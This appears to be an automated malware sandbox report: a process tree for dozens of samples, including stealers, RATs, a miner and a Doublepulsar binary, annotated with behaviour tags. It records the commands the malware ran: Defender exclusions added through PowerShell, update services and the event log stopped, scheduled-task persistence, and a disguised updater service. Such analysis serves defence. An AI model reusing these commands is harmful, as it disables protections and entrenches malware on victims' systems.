C:\Users\Admin\AppData\Local\Temp\Files\Wattyl.exe"C:\Users\Admin\AppData\Local\Temp\Files\Wattyl.exe"2⤵
- Modifies WinLogon for persistence
- Disables RegEdit via registry modification
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
PID:7664 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C AT /delete /yes3⤵PID:2880
-
C:\Windows\SysWOW64\at.exeAT /delete /yes4⤵PID:4756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe3⤵PID:4876
-
C:\Windows\SysWOW64\at.exeAT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe4⤵PID:6816
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dota.exe"C:\Users\Admin\AppData\Local\Temp\Files\dota.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:1808
-
-
C:\Users\Admin\AppData\Local\Temp\Files\net.exe"C:\Users\Admin\AppData\Local\Temp\Files\net.exe"2⤵PID:6636
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dropper_cs.exe"C:\Users\Admin\AppData\Local\Temp\Files\dropper_cs.exe"2⤵PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\Files\r.exe"C:\Users\Admin\AppData\Local\Temp\Files\r.exe"2⤵PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"2⤵PID:6340
-
-
C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"2⤵
- Suspicious use of SetThreadContext
PID:7004 -
C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"3⤵PID:6716
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\images.exe"C:\Users\Admin\AppData\Local\Temp\Files\images.exe"2⤵
- Modifies WinLogon for persistence
- Disables RegEdit via registry modification
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
PID:2140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C AT /delete /yes3⤵PID:8444
-
C:\Windows\SysWOW64\at.exeAT /delete /yes4⤵PID:9100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe3⤵PID:6820
-
C:\Windows\SysWOW64\at.exeAT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe4⤵PID:2860
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jopacrypt.exe"C:\Users\Admin\AppData\Local\Temp\Files\jopacrypt.exe"2⤵PID:8392
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6920
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:8124
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5572
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"2⤵PID:8480
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Itkool-Setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\Itkool-Setup.exe"2⤵PID:9204
-
-
C:\Users\Admin\AppData\Local\Temp\Files\inte.exe"C:\Users\Admin\AppData\Local\Temp\Files\inte.exe"2⤵PID:8156
-
-
C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"2⤵PID:8232
-
-
C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe"C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe"2⤵
- Suspicious use of SetThreadContext
PID:8512
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe"C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe"2⤵PID:8796
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\Files\lumma1234.exe"2⤵
- Suspicious use of SetThreadContext
PID:9104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:8556
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:8452
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"2⤵PID:488
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NeonRank.exe"C:\Users\Admin\AppData\Local\Temp\Files\NeonRank.exe"2⤵PID:8624
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit3⤵PID:10028
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\minuscrypt_crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\minuscrypt_crypted.exe"2⤵
- Suspicious use of SetThreadContext
PID:6724 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:7648
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"2⤵PID:9140
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NancyMfg.exe"C:\Users\Admin\AppData\Local\Temp\Files\NancyMfg.exe"2⤵PID:8592
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Blowjob Blowjob.bat & Blowjob.bat & exit3⤵PID:9156
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"2⤵PID:1312
-
-
C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"2⤵PID:6308
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe"C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe"2⤵
- Checks SCSI registry key(s)
PID:6512
-
-
C:\Users\Admin\AppData\Local\Temp\Files\fortnite2.exe"C:\Users\Admin\AppData\Local\Temp\Files\fortnite2.exe"2⤵PID:8684
-
-
C:\Users\Admin\AppData\Local\Temp\Files\costa.exe"C:\Users\Admin\AppData\Local\Temp\Files\costa.exe"2⤵PID:6348
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe"2⤵PID:8484
-
-
C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"2⤵PID:9176
-
C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"3⤵
- Checks SCSI registry key(s)
PID:8712
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"2⤵
- Suspicious use of SetThreadContext
PID:8844 -
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"3⤵PID:6696
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe"C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe"2⤵PID:8424
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ce0b953269c74bc.exe"C:\Users\Admin\AppData\Local\Temp\Files\ce0b953269c74bc.exe"2⤵PID:5948
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6560
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Horpxuoxm.exe"C:\Users\Admin\AppData\Local\Temp\Files\Horpxuoxm.exe"2⤵PID:6464
-
-
C:\Users\Admin\AppData\Local\Temp\Files\1234daisaaaaa.exe"C:\Users\Admin\AppData\Local\Temp\Files\1234daisaaaaa.exe"2⤵PID:7812
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:9456
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"2⤵PID:9052
-
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"3⤵PID:7752
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\plink.exe"C:\Users\Admin\AppData\Local\Temp\Files\plink.exe"2⤵
- Suspicious use of SetThreadContext
PID:7388 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6064
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe"C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe"2⤵PID:8172
-
C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe"C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe" --install .3⤵PID:6376
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\rty37.exe"C:\Users\Admin\AppData\Local\Temp\Files\rty37.exe"2⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:5984
-
-
C:\Users\Admin\AppData\Local\Temp\Files\LM.exe"C:\Users\Admin\AppData\Local\Temp\Files\LM.exe"2⤵PID:8944
-
-
C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"2⤵PID:2044
-
-
C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe"C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe"2⤵PID:8680
-
-
C:\Users\Admin\AppData\Local\Temp\Files\html.exe"C:\Users\Admin\AppData\Local\Temp\Files\html.exe"2⤵PID:9188
-
-
C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"2⤵PID:2672
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v0nyu9h-.cmdline"3⤵PID:1648
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\v4install.exe"C:\Users\Admin\AppData\Local\Temp\Files\v4install.exe"2⤵PID:3788
-
-
C:\Users\Admin\AppData\Local\Temp\Files\current.exe"C:\Users\Admin\AppData\Local\Temp\Files\current.exe"2⤵PID:8328
-
-
C:\Users\Admin\AppData\Local\Temp\Files\123.exe"C:\Users\Admin\AppData\Local\Temp\Files\123.exe"2⤵PID:8760
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"3⤵PID:10708
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\beacon_wlan0.exe"C:\Users\Admin\AppData\Local\Temp\Files\beacon_wlan0.exe"2⤵PID:6840
-
-
C:\Users\Admin\AppData\Local\Temp\Files\d4598b22.exe"C:\Users\Admin\AppData\Local\Temp\Files\d4598b22.exe"2⤵PID:7304
-
-
C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe"C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe"2⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe"C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe"3⤵
- Suspicious use of SetThreadContext
PID:8392
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lolMiner.exe"C:\Users\Admin\AppData\Local\Temp\Files\lolMiner.exe"2⤵PID:7748
-
-
C:\Users\Admin\AppData\Local\Temp\Files\native.exe"C:\Users\Admin\AppData\Local\Temp\Files\native.exe"2⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:7840
-
-
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_4.exe"C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_4.exe"2⤵PID:1804
-
-
C:\Users\Admin\AppData\Local\Temp\Files\goldpricesup12.exe"C:\Users\Admin\AppData\Local\Temp\Files\goldpricesup12.exe"2⤵PID:8268
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7028
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\superz.exe"C:\Users\Admin\AppData\Local\Temp\Files\superz.exe"2⤵PID:3324
-
-
C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe"C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe"2⤵PID:7444
-
-
C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe"C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe"2⤵PID:10884
-
-
C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"2⤵PID:8876
-
C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"3⤵PID:2024
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VoidRAT.exe"C:\Users\Admin\AppData\Local\Temp\Files\VoidRAT.exe"2⤵PID:6704
-
-
C:\Users\Admin\AppData\Local\Temp\Files\more.exe"C:\Users\Admin\AppData\Local\Temp\Files\more.exe"2⤵PID:11200
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"1⤵
- Creates scheduled task(s)
PID:2372
-
C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe"C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe" -service -lunch1⤵PID:2132
-
C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe"C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe"2⤵
- Executes dropped EXE
PID:2640
-
-
C:\Users\Admin\AppData\Local\Temp\721E.exeC:\Users\Admin\AppData\Local\Temp\721E.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4068
-
C:\Users\Admin\AppData\Local\Temp\96CD.exeC:\Users\Admin\AppData\Local\Temp\96CD.exe1⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\96CD.exeC:\Users\Admin\AppData\Local\Temp\96CD.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4268 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\24d0272b-cda1-42f8-be99-bd7f28cf6634" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:4872
-
-
C:\Users\Admin\AppData\Local\Temp\96CD.exe"C:\Users\Admin\AppData\Local\Temp\96CD.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:4480
-
C:\Users\Admin\AppData\Local\Temp\96CD.exe"C:\Users\Admin\AppData\Local\Temp\96CD.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
PID:2572 -
C:\Users\Admin\AppData\Local\23b6aa04-7b25-441d-a543-1fb206476212\build2.exe"C:\Users\Admin\AppData\Local\23b6aa04-7b25-441d-a543-1fb206476212\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5072 -
C:\Users\Admin\AppData\Local\23b6aa04-7b25-441d-a543-1fb206476212\build2.exe"C:\Users\Admin\AppData\Local\23b6aa04-7b25-441d-a543-1fb206476212\build2.exe"6⤵
- Executes dropped EXE
PID:1336 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 14447⤵
- Program crash
PID:5952
-
-
-
-
C:\Users\Admin\AppData\Local\23b6aa04-7b25-441d-a543-1fb206476212\build3.exe"C:\Users\Admin\AppData\Local\23b6aa04-7b25-441d-a543-1fb206476212\build3.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4360 -
C:\Users\Admin\AppData\Local\23b6aa04-7b25-441d-a543-1fb206476212\build3.exe"C:\Users\Admin\AppData\Local\23b6aa04-7b25-441d-a543-1fb206476212\build3.exe"6⤵
- Executes dropped EXE
PID:1332 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:4152 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1600
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BEF8.exeC:\Users\Admin\AppData\Local\Temp\BEF8.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\filename.exe"C:\Users\Admin\AppData\Local\Temp\filename.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5020 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵PID:5260
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4320
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:3996
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:5964
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4792
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:5584
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:4788
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:4244
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵PID:3388
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵PID:5900
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵PID:6084
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵PID:5220
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:3512
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:5672
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:4324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D48.exeC:\Users\Admin\AppData\Local\Temp\D48.exe1⤵
- Executes dropped EXE
PID:1864
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\298B.bat" "1⤵PID:776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵PID:5412
-
-
C:\Users\Admin\AppData\Local\Temp\4AD0.exeC:\Users\Admin\AppData\Local\Temp\4AD0.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5132 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:6104
-
-
C:\Users\Admin\AppData\Local\Temp\9C7B.exeC:\Users\Admin\AppData\Local\Temp\9C7B.exe1⤵PID:5428
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe2⤵PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\B989.exeC:\Users\Admin\AppData\Local\Temp\B989.exe1⤵PID:5852
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
PID:5576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵PID:6504
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:5076
-
-
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5840
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
PID:5864
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2664 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4032
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5800
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5948
-
C:\ProgramData\odvhyxzhhqlu\gzexiztdwrwd.exeC:\ProgramData\odvhyxzhhqlu\gzexiztdwrwd.exe1⤵
- Suspicious use of SetThreadContext
PID:5204 -
C:\Windows\explorer.exeexplorer.exe2⤵PID:4112
-
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5932
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s Netman1⤵PID:7112
-
C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exeC:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe1⤵PID:7388
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:7436
-
-
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exeC:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe1⤵
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
PID:5784 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:7808
-
-
C:\Windows\system32\conhost.execonhost.exe2⤵PID:7224
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:236 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4F63EC662232C9C9E2298DC9D382CF86 C2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:6788
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 776BEBA22A83F5914ACAF76AAFAF71602⤵PID:6868
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:7608
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5316
-
C:\Users\Admin\AppData\Roaming\uuishcrC:\Users\Admin\AppData\Roaming\uuishcr1⤵PID:6680
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6740
-
C:\Users\Admin\AppData\Roaming\Windata\system.exeC:\Users\Admin\AppData\Roaming\Windata\system.exe1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -s Netman1⤵PID:7976
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8132
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
PID:7996
-
C:\Users\Admin\AppData\Roaming\Windata\system.exeC:\Users\Admin\AppData\Roaming\Windata\system.exe1⤵PID:2388
-
